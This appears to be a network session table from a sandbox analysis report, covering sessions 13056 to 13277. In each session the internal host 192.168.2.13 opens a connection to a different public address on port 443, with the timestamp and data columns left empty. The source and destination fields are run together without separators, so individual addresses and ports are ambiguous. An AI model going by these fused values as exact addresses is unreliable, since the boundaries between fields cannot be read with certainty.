                                        13056192.168.2.1348946166.40.171.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13057192.168.2.1357232192.213.174.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13058192.168.2.1334818116.109.230.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13059192.168.2.134865220.36.247.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13060192.168.2.1342846152.154.223.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13061192.168.2.1354076174.143.85.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13062192.168.2.1359394175.219.183.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13063192.168.2.135423888.167.67.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13064192.168.2.1351944120.171.112.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13065192.168.2.1342944156.103.102.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13066192.168.2.133577846.255.111.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13067192.168.2.135600651.243.188.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13068192.168.2.1342658146.102.171.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13069192.168.2.1341278213.251.32.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13070192.168.2.134745477.220.235.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13071192.168.2.1344098163.168.203.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13072192.168.2.136022650.244.163.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13073192.168.2.1346684181.163.183.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13074192.168.2.13448004.3.103.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13075192.168.2.134433441.144.198.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13076192.168.2.134807636.50.124.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13077192.168.2.133860267.255.44.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13078192.168.2.134752632.112.62.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13079192.168.2.1350972105.132.146.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13080192.168.2.1344112207.55.76.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13081192.168.2.134110464.134.163.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13082192.168.2.1344174163.81.58.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13083192.168.2.1346616198.111.162.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13084192.168.2.135456493.61.181.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13085192.168.2.1360290107.182.52.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13086192.168.2.134285863.13.10.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13087192.168.2.134374689.25.82.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13088192.168.2.1346686114.220.113.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13089192.168.2.1359168204.251.243.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13090192.168.2.1358550138.72.222.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13091192.168.2.1334808135.105.72.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13092192.168.2.135340245.45.177.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13093192.168.2.1334014191.57.219.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13094192.168.2.134674420.22.56.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13095192.168.2.133867495.48.194.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13096192.168.2.1343382168.191.24.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13097192.168.2.135909268.30.208.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13098192.168.2.134513879.209.109.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13099192.168.2.1349970208.78.96.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13100192.168.2.1346610154.70.199.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13101192.168.2.133979446.206.221.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13102192.168.2.1358488209.134.227.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13103192.168.2.135208467.69.182.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13104192.168.2.135182669.179.219.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13105192.168.2.133303878.240.85.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13106192.168.2.1347596219.99.180.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13107192.168.2.134009097.22.174.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13108192.168.2.1342430142.100.79.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13109192.168.2.134865631.244.184.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13110192.168.2.1355508183.130.37.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13111192.168.2.135439673.180.81.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13112192.168.2.1345480216.1.21.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13113192.168.2.135299295.123.215.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13114192.168.2.1347358187.84.209.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13115192.168.2.1348026129.65.97.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13116192.168.2.135000439.1.117.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13117192.168.2.133448268.70.149.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13118192.168.2.133764677.127.67.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13119192.168.2.1357332163.20.79.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13120192.168.2.1356530139.186.101.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13121192.168.2.1335402180.60.219.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13122192.168.2.1333024169.2.103.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13123192.168.2.134347669.44.219.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13124192.168.2.1351744118.204.69.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13125192.168.2.133476686.247.93.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13126192.168.2.133872818.109.124.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13127192.168.2.134649653.132.195.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13128192.168.2.13587529.213.204.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13129192.168.2.135898699.58.180.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13130192.168.2.133641693.82.57.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13131192.168.2.136073290.0.0.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13132192.168.2.1348408222.104.79.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13133192.168.2.1344816203.197.179.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13134192.168.2.134827023.211.156.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13135192.168.2.133705239.204.4.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13136192.168.2.1344294158.126.137.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13137192.168.2.1346992218.124.244.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13138192.168.2.1332904106.233.77.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13139192.168.2.1358412213.228.240.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13140192.168.2.1341754173.37.213.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13141192.168.2.1348792130.222.2.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13142192.168.2.134656232.13.68.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13143192.168.2.1337110124.169.11.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13144192.168.2.134467864.208.197.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13145192.168.2.1334214150.184.84.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13146192.168.2.1345882165.51.79.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13147192.168.2.135003676.3.164.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13148192.168.2.1357510193.238.246.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13149192.168.2.1344140131.104.134.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13150192.168.2.1347356204.54.234.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13151192.168.2.134069687.9.55.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13152192.168.2.13351361.168.247.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13153192.168.2.136093878.75.161.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13154192.168.2.1348232172.76.143.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13155192.168.2.134895427.40.125.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13156192.168.2.134409872.82.148.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13157192.168.2.136045062.130.88.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13158192.168.2.1333182181.142.0.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13159192.168.2.133999889.67.31.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13160192.168.2.134008879.214.255.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13161192.168.2.133424862.218.212.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13162192.168.2.1343356100.185.183.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13163192.168.2.1355402169.126.179.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13164192.168.2.1339942137.184.140.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13165192.168.2.133890859.4.66.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13166192.168.2.134752214.3.115.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13167192.168.2.1350742129.171.235.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13168192.168.2.135638491.213.33.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13169192.168.2.1340794145.112.84.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13170192.168.2.1350482142.146.63.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13171192.168.2.1349452217.4.137.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13172192.168.2.133940460.20.60.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13173192.168.2.134858213.51.241.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13174192.168.2.1348978178.25.210.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13175192.168.2.1344464211.177.167.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13176192.168.2.1350554153.131.9.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13177192.168.2.1347558157.55.225.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13178192.168.2.13423241.60.62.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13179192.168.2.1344248104.181.43.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13180192.168.2.134878236.190.145.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13181192.168.2.1346330161.130.156.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13182192.168.2.1338340147.67.11.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13183192.168.2.134514847.200.231.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13184192.168.2.135002493.35.193.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13185192.168.2.1339356104.92.211.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13186192.168.2.1342104185.227.62.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13187192.168.2.135529847.187.90.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13188192.168.2.1344736126.159.201.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13189192.168.2.1343162124.173.73.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13190192.168.2.134728090.175.8.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13191192.168.2.1357676142.205.252.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13192192.168.2.13351008.69.184.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13193192.168.2.135553435.239.235.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13194192.168.2.1340292206.21.221.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13195192.168.2.1351254124.131.165.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13196192.168.2.1358994153.237.146.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13197192.168.2.1351738176.184.84.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13198192.168.2.135123212.0.25.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13199192.168.2.1343768166.30.158.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13200192.168.2.1354880130.222.51.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13201192.168.2.1353586211.163.133.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13202192.168.2.1352740108.239.251.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13203192.168.2.1356572190.12.207.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13204192.168.2.1335402147.124.57.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13205192.168.2.1350690132.26.226.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13206192.168.2.134006035.5.142.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13207192.168.2.1356294108.232.19.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13208192.168.2.1359852164.60.6.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13209192.168.2.133312665.212.91.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13210192.168.2.1343388163.13.224.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13211192.168.2.1354302154.121.176.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13212192.168.2.1336942221.45.94.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13213192.168.2.135179864.43.228.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13214192.168.2.1340742126.11.216.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13215192.168.2.1353988199.27.57.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13216192.168.2.135600052.78.174.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13217192.168.2.1350794139.19.116.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13218192.168.2.134036834.32.251.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13219192.168.2.1335382169.135.252.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13220192.168.2.134778243.235.92.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13221192.168.2.134362636.93.156.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13222192.168.2.1339624209.90.213.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13223192.168.2.1346676138.94.33.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13224192.168.2.135427865.183.231.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13225192.168.2.1341060218.72.168.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13226192.168.2.1349262141.202.188.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13227192.168.2.135008024.182.167.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13228192.168.2.1336804169.52.148.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13229192.168.2.1342394176.116.105.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13230192.168.2.1340214200.99.97.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13231192.168.2.134889441.210.198.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13232192.168.2.133361253.67.213.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13233192.168.2.1358966191.56.115.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13234192.168.2.1350538107.201.190.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13235192.168.2.1335176143.21.60.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13236192.168.2.133466467.24.229.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13237192.168.2.135868635.13.29.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13238192.168.2.134948617.188.76.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13239192.168.2.1354560147.11.191.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13240192.168.2.1344886126.16.71.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13241192.168.2.1342944157.57.132.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13242192.168.2.1345942213.117.183.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13243192.168.2.1348570157.248.52.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13244192.168.2.1351082101.174.66.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13245192.168.2.135051695.60.162.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13246192.168.2.1352530103.152.45.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13247192.168.2.1335486212.2.128.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13248192.168.2.135612040.122.181.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13249192.168.2.1337626186.11.163.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13250192.168.2.1345284141.112.28.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13251192.168.2.133435042.124.207.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13252192.168.2.1339608101.49.253.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13253192.168.2.1345094205.177.131.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13254192.168.2.1346000167.35.56.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13255192.168.2.1358964188.42.211.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13256192.168.2.13465722.186.72.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13257192.168.2.1351310120.242.247.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13258192.168.2.1351022129.63.46.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13259192.168.2.135139285.58.106.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13260192.168.2.1334260200.17.61.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13261192.168.2.134285259.198.55.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13262192.168.2.1347268176.152.82.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13263192.168.2.135949498.175.221.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13264192.168.2.1350732209.214.47.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13265192.168.2.13567904.27.22.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13266192.168.2.1346034165.13.224.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13267192.168.2.1355878112.164.174.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13268192.168.2.1338264183.166.146.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13269192.168.2.1341762197.24.14.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13270192.168.2.134854225.158.21.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13271192.168.2.1349760146.211.73.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13272192.168.2.1344214222.4.84.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13273192.168.2.133552288.207.44.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13274192.168.2.134108623.28.142.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13275192.168.2.1355274186.130.203.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13276192.168.2.1338804151.139.93.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        13277192.168.2.1359010180.3.142.153443
                                        TimestampBytes transferredDirectionData


